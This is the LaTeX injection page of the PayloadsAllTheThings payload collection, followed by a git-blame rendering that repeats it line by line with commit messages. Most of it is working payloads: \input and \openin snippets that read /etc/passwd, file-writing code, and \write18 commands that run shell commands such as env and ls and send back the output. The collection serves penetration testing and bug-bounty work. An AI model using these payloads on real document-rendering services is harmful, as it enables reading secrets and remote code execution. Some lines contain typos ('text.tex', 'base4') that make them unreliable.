PayloadsAllTheThings/LaTeX injection/README.md

# LaTex Injection

## Read file
```bash
\input{/etc/passwd}
\include{password} # load .tex file
```

Read single lined file
```bash
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```

Read multiple lined file
```bash
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline 
    \text{\fileline}
\repeat
\closein\file
```

## Write file
```bash
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
```

## Command execution
The input of the command will be redirected to stdin, use a temp file to get it.
```bash
\immediate\write18{env > output}
\input{output}
```
If you get any LaTex error, consider using base64 to get the result without bad characters
```bash
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
```

```bash
\input|ls|base4
```


## Thanks to
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`# LaTex Injection`

			`## Read file`
LaTex injection - typo language markdown 2018-07-22 22:39:37 +02:00			```bash
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\input{/etc/passwd}`
			`\include{password} # load .tex file`
			```

			`Read single lined file`
LaTex injection - typo language markdown 2018-07-22 22:39:37 +02:00			```bash
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\newread\file`
			`\openin\file=/etc/issue`
			`\read\file to\line`
			`\text{\line}`
			`\closein\file`
			```

			`Read multiple lined file`
LaTex injection - typo language markdown 2018-07-22 22:39:37 +02:00			```bash
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\newread\file`
			`\openin\file=/etc/passwd`
			`\loop\unless\ifeof\file`
			`\read\file to\fileline`
			`\text{\fileline}`
			`\repeat`
			`\closein\file`
			```

			`## Write file`
LaTex injection - typo language markdown 2018-07-22 22:39:37 +02:00			```bash
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\newwrite\outfile`
			`\openout\outfile=cmd.tex`
			`\write\outfile{Hello-world}`
			`\closeout\outfile`
			```

			`## Command execution`
			`The input of the command will be redirected to stdin, use a temp file to get it.`
LaTex injection - typo language markdown 2018-07-22 22:39:37 +02:00			```bash
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\immediate\write18{env > output}`
			`\input{output}`
			```
			`If you get any LaTex error, consider using base64 to get the result without bad characters`
LaTex injection - typo language markdown 2018-07-22 22:39:37 +02:00			```bash
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\immediate\write18{env \| base64 > test.tex}`
			`\input{text.tex}`
			```

LaTex injection - typo language markdown 2018-07-22 22:39:37 +02:00			```bash
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\input\|ls\|base4`
			```


			`## Thanks to`
			`* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)`
			`* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)`
			`* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)`